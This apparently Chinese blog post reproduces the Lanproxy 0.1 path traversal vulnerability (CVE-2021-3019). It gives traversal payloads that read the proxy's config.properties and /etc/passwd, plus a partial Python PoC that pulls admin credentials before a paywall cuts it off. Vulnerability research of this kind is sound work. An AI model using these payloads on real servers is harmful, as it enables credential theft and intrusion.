Lanproxy 路径遍历漏洞 (CVE-2021-3019)复现以及suricata检测

最新推荐文章于 2024-08-09 18:00:00 发布
最新推荐文章于 2024-08-09 18:00:00 发布
阅读量1.5k 收藏
点赞数
分类专栏: 漏洞复现 安全攻防
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43886632/article/details/112508687
版权

0x01 Lanproxy简介

Lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面等等)

0x02 漏洞简介

本次Lanproxy 路径遍历漏洞 (CVE-2021-3019)通过…/绕过读取任意文件。该漏洞允许目录遍历读取/…/conf/config.properties来获取到内部网连接的凭据。

0x03 影响版本
lanproxy 0.1

0x04 环境搭建

(1)Lanproxy下载

 https://file.nioee.com/d/2e81550ebdbd416c933f/files/?p=/proxy-server-0.1.zip

(2)启动服务
解压缩后进入bin目录执行 ./startup.sh启动服务
在这里插入图片描述
(3)访问8090端口,如图环境搭建成功
在这里插入图片描述
0x05 漏洞复现
上poc ../conf/config.properties

在这里插入图片描述
读取 /etc/passwd 文件
/../../../../../../../../../etc/passwd
在这里插入图片描述0x06 POC脚本

import sys
import argparse
import os
from urllib import request
from urllib import parse
from urllib import error



headers = {
   
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/82.0.4080.0 Safari/537.36 Edg/82.0.453.0"}

def readConf(url):
    """
    默认读取配置文件,并通过能否读取配置文件来判断是否存在漏洞
    """
    config = [
        'config.server.bind',
        'config.server.port',
        'config.admin.username',
        'config.admin.password'
    ]
    path = "/../conf/config.properties"
    confUrl = url + path
    r = request.Request(confUrl, headers=headers)
    try:
        with request.urlopen(r, timeout=10) as resp:
            confContent = resp.read().decode('utf-8')
            for i in config:
                if i not in confContent
最低0.47元/天 解锁文章
MOSFETSOA
sinat_15677011的博客
07-06 5144
Safe Operating Area(SOA)有的厂家将他称之为 “Area of Safe Operation (ASO)安全工作区SOA(Safe operating area)是由一系列(电压,电流)坐标点形成的一个二维区域,开关器件正常工作时的电压和电流都不会超过该区域。简单地讲,只要器件工作在SOA区域内就是安全的,超过这个区域就存在危险。SOA(Safe operating area)是指安全工作区,由一系列限制条件组成的一个漏源极电压VDS和漏极电流ID的二维坐标图,开关器件正常工作时的
MOS安全工作区SOA及根据SOA选择MOS
lzscan的专栏
12-22 2287
本文介绍了MOS管的安全工作区SOA)的定义以及如何使用SOA选择MOS管,最终给出常用的热插拔场景下的MOS管。
【顾邦小讲堂】第五期 带你深入理解功率MOSFET规格书中参数和图表(4)
最新发布
GBupupup的博客
08-09 794
“今天我就给大家详细讲述下SOA曲线簇各部分都是怎么形成的,希望对大家以后使用SOA曲线评估极限工况时有所帮助”
【电介质】SiC MOSFET栅极电介质的安全工作区
荷塘阅色
04-09 1714
这篇文章介绍了关于SiC MOSFETs栅介质的安全工作区SOA)概念。文章首先定义了SOA为在应力时间—电场—温度空间内晶体管保持在数据表规格内的参数,这比传统的失效率(tfail)更有用。文章通过Weibull统计分析,得出在5ppm,20年,175°C条件下,onsemi SiC MOSFET产品的SOA大约是Vgs=21.5V。
MOS管测试方案Q&A
qq_42563312的博客
02-04 1004
A:VGS两端的10V不能持续加载,按照Pulse width≤300us,Duty cycle≤2%来加载。A:S极加载的电压波形需要满足 Pulse width≤300us,Duty cycle≤2%A:保证环境温度25℃,D极浮空(目的是不加电流),加载的12V无波形和时间限制。A:MOS管体表温度不超过46℃,基本可以判定合格。
MOSFETSOA或者ASO是什么?
huxyc的博客
06-10 2441
Safe Operating Area(SOA)有的厂家将他称之为 “Area of Safe Operation (ASO)安全工作区SOA(Safe operating area)是由一系列(电压,电流)坐标点形成的一个二维区域,开关器件正常工作时的电压和电流都不会超过该区域。简单地讲,只要器件工作在SOA区域内就是安全的,超过这个区域就存在危险。SOA(Safe operating area)是指安全工作区,由一系列限制条件组成的一个漏源极电压VDS和漏极电流ID的二维坐标图,开关器件正常工作时的
MOS 管 datasheet 阅读(1)- 安全工作曲线 SOA
paper_tigers的博客
01-14 2530
了解 MOS 管的 SOA 安全工作曲线,包括温度降额,不同脉宽电流估算。
MOSFET安全工作区SOA
粟米茶
11-28 1304
Safe Operating Area(SOA)即安全工作区:描述了当MOSFET工作在饱和区时可以处理的最大功率。超出安全工作区,则可能导致元件损坏。
详解MOS管发热的原因
08-21
因此,在进行电路设计时,必须仔细考量MOS管的导通电阻RDS(ON)、额定电流及安全工作区SOA),确保MOS管的参数能够应对电路实际的工作条件。 综上所述,MOS管发热的原因主要包含非理想开关状态下的工作、过高的...
参考资料-(核心)功率MOSFET安全工作区SOA:真的安全.zip
01-16
参考资料-(核心)功率MOSFET安全工作区SOA:真的安全.zip
电源技术中的功率MOS管的五种损坏模式详解
10-15
这是由器件超出安全工作区SOA)导致的过热所造成的。过热可以由直流功率和瞬态功率两个方面引起。 - **直流功率原因**:主要是由于导通电阻RDS(on)的损耗,当RDS(on)随着温度升高而增加时,即使在相同的电流下,...
MOS安全工作区SOA
热门推荐
qlexcel的专栏
05-01 1万+
注:内容转自广州致远电子有限公司《如何确保MOS管工作在安全区》 一、引出 开关器件长期工作于高电压大电流状态,承受着很大的功耗,一但过压或过流就会导致功耗大增,晶圆结温急剧上升,如果散热不及时,就会导致器件损坏,甚至可能会伴随爆炸,非常危险。这里就衍生一个概念,安全工作区。  安全工作区SOA(Safe operating area)是由一系列(电...
安全工作区SOA是什么?有什么作用?(MOS管篇)
VBsemi的博客
04-15 2013
⑤ 在MOS管正常工作时,测量其外壳温度,并利用降额公式计算出温度影响下的调整后电流值:I(降额)=Isoa×温度调整系数。这是因为它们分别对应了不同脉冲时间的限制,如果脉冲持续的时间越长,MOS管承受的电、热应力就会更大,并且容易发生损坏。当硅芯片上面某块区域的温度高于其它地方,并且处于正温度系数区域,那么它的电流也会高于其它地方。在固定的Vds的情况下,Vgs的电压不变,不同的Vgs,ID电流是不同的。曲线是线性的,一般厂家给出的SOA曲线,是指在某一特定工作条件下使用的。
安全工作区 SOA
2303_77116490的博客
06-30 903
SOA曲线介绍
MOSFET SOA評估與Tj溫度的計算
tinycool84的博客
07-22 2155
SOA與Tj通常是用來評估MOSFET操作是否安全可靠的二個判斷機制,甚至當MOSFET發生損壞時,也會使用SOA與Tj來加以確認其計算結果是否在MOSFET所定義的規格之內 ~SOA(安全操作區域)~
MOS管进阶部分,那些你不了解的MOS管知识
qq_39564551的博客
05-04 6398
MOS管的开启电压到底应该怎么选?MOS管真的只是电压驱动对电流没有一点要求吗?MOS管的极限参数怎么看?MOS管的SOA曲线怎么看?
[电路/定理]MOSSOA区间分析
ic2121的博客
09-06 2689
以上图中的SOA安全区域是在一定的特定条件下的要求,在实际的应用中,环境温度会发生变化,也就是MOS的TJ温度发生变化,安全区域也会随之发生变化,所以在实际的应用中一定要考虑对SOA区域进行降额使用,保证MOS完全工作在合理的安全的工作区间内。功率MOS在使用过程中是否能够安全持续的工作,是设计者必须要考虑的问题,设计者在应用MOS时,必须考虑MOSSOA区间,我们知道开关电源中的MOS长期工作在高电流高电压下,很容易出现过热烧毁的情况,如果散热不及时的话,很容易发生爆炸。
MOS管开关电路设计详解
本文主要探讨了MOS管开关电路设计的关键要素和注意事项,涵盖了MOS管的种类、结构、导通特性以及在开关电路中的应用。MOSFET,即金属-氧化物-半导体场效应晶体管,是电子工程中常用的开关元件,常用于开关电源和电机...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值